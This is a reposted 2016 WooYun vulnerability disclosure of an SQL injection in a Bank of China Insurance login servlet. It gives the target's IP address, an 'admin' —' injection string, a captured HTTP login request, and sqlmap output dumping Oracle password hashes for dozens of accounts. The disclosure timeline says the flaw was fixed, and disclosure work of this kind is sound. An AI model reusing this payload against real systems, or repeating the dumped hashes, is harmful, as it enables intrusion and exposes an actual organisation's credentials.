神刀安全网

漏洞标题: 中银保险某系统一处SQL注入漏洞(DBA权限26库)

漏洞详情

披露状态:

2016-03-10: 细节已通知厂商并且等待厂商处理中
2016-03-11: 厂商已经确认,细节仅向厂商公开
2016-03-16: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

点到为止吧,第三方软件不可靠啊。

详细说明:

今天在首页浏览漏洞,发现了公开了“ WooYun: 中银保险车险某系统后台弱口令导致Getshell(涉及车险信息) ”漏洞,于是就看了下,发现该漏洞描存在的情况已经不存在了,提交到公开就3天,处理速度还蛮快的..

漏洞证明:

于是就继续测试了下:http://219.143.241.24:8001/aqqx/

漏洞标题:  中银保险某系统一处SQL注入漏洞(DBA权限26库)

试了下弱密码之类的没试出来,就知道用户名是admin,该系统用户名输入正确,密码输入错误时,提示“密码错误”,算是个小问题吧,系统也没验证码,可尝试暴力破解。

漏洞标题:  中银保险某系统一处SQL注入漏洞(DBA权限26库)

由于我的网速不给力就放弃了,可是发现了登录用户名username存在注入。

用户名输入:admin' —

密码随意

漏洞标题:  中银保险某系统一处SQL注入漏洞(DBA权限26库)

点击登录后,系统没报错,而是跳转到如下页面:

漏洞标题:  中银保险某系统一处SQL注入漏洞(DBA权限26库)

于是对登录进行抓包,使用SQLMAP测试下username

code 区域
POST /aqqx/LoginServlet HTTP/1.1
Host: 219.143.241.24:8001
Proxy-Connection: keep-alive
Content-Length: 32
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://219.143.241.24:8001
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://219.143.241.24:8001/aqqx/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: JSESSIONID=71MCWgLN5YVcd2C8TKV1vctpbRf2FjwHQmkGjmGFLzzHBDD772Cg!-1792212123

username=admin&password=11111111

测试结果如下:

漏洞标题:  中银保险某系统一处SQL注入漏洞(DBA权限26库)

dba权限的

漏洞标题:  中银保险某系统一处SQL注入漏洞(DBA权限26库)

基于时间的盲注跑数据太慢了,就点到位为止吧:

26库:

漏洞标题:  中银保险某系统一处SQL注入漏洞(DBA权限26库)

current-db:

漏洞标题:  中银保险某系统一处SQL注入漏洞(DBA权限26库)

current-user –password:

code 区域
web application technology: Servlet 2.4, JSP, JSP 2.0
back-end DBMS: Oracle
current user: 'AQQX_BD'
database management system users password hashes:
[*] ANONYMOUS [1]:
password hash: anonymous
[*] AQQX_BD [1]:
password hash: 5A9828B458AEF00D
[*] AQQX_CS [1]:
password hash: A79F29192DF10DA1
[*] CTXSYS [1]:
password hash: 71E687F036AD56E5
[*] DBSNMP [1]:
password hash: FFF45BB2C0C327EC
[*] DIP [1]:
password hash: CE4A36B8E06CA59C
[*] DMSYS [1]:
password hash: BFBA5A553FD9E28A
[*] EXFSYS [1]:
password hash: 66F4EF5650C20355
[*] FOGLIGHT [1]:
password hash: 16CE1767CEAE6835
[*] JYQUERY [1]:
password hash: DD08F28B8108C411
[*] MDDATA [1]:
password hash: DF02A496267DEE66
[*] MDSYS [1]:
password hash: 72979A94BAD2AF80
[*] MGMT_VIEW [1]:
password hash: ACC69AC5E5C7872C
[*] OLAPSYS [1]:
password hash: 3FB8EF9DB538647C
[*] ORDPLUGINS [1]:
password hash: 88A2B2C183431F00
[*] ORDSYS [1]:
password hash: 7EFA02EC7EA6B86F
[*] OUTLN [1]:
password hash: 4A3BA55E08595C81
[*] PJBJ_BD [1]:
password hash: 70A26E4027F00ABC
[*] PJBJ_CS [1]:
password hash: 74FFFD9EF5E8D3D1
[*] pjbj_j y_2 [1]:
password hash: FC34EA976A65473E
[*] PJBJ_JY [1]:
password hash: 083AA3AFB062C335
[*] PJBJ_JY2 [1]:
password hash: 462CDA5C451BB9FE
[*] PJBJ_JY_1 [1]:
password hash: 253C932F57789AF1
[*] PJBJ_KF [1]:
password hash: 91D956975D9D528F
[*] PJBJ_QY [1]:
password hash: 8FA2BDED924141F5
[*] PJBJ_YS [1]:
password hash: 26F301A33A63075F
[*] SCOTT [1]:
password hash: F894844C34402B67
[*] SI_INFORMTN_SCHEMA [1]:
password hash: 84B8CBCA4D477FA3
[*] SYS [1]:
password hash: 4B944C7BE803D6C8
[*] SYSMAN [1]:
password hash: 1DEA5CF775BB128B
[*] SYSTEM [1]:
password hash: 11560E4C486B25F8
[*] TSMSYS [1]:
password hash: 3DF26A8B17D0F29F
[*] WMSYS [1]:
password hash: 7C9BA362F8314299
[*] XDB [1]:
password hash: 88D8364765FCE6AF
[*] ZHENGCHE [1]:
password hash: FFA856E41B9397D0

当前数据库包含18表:

漏洞标题:  中银保险某系统一处SQL注入漏洞(DBA权限26库)

AQQX_CS数据库:

漏洞标题:  中银保险某系统一处SQL注入漏洞(DBA权限26库)

数据我就不给你们跑了。

修复方案:

能给个高分吗..

版权声明:转载请注明来源 暴走@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 中银保险某系统一处SQL注入漏洞(DBA权限26库)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮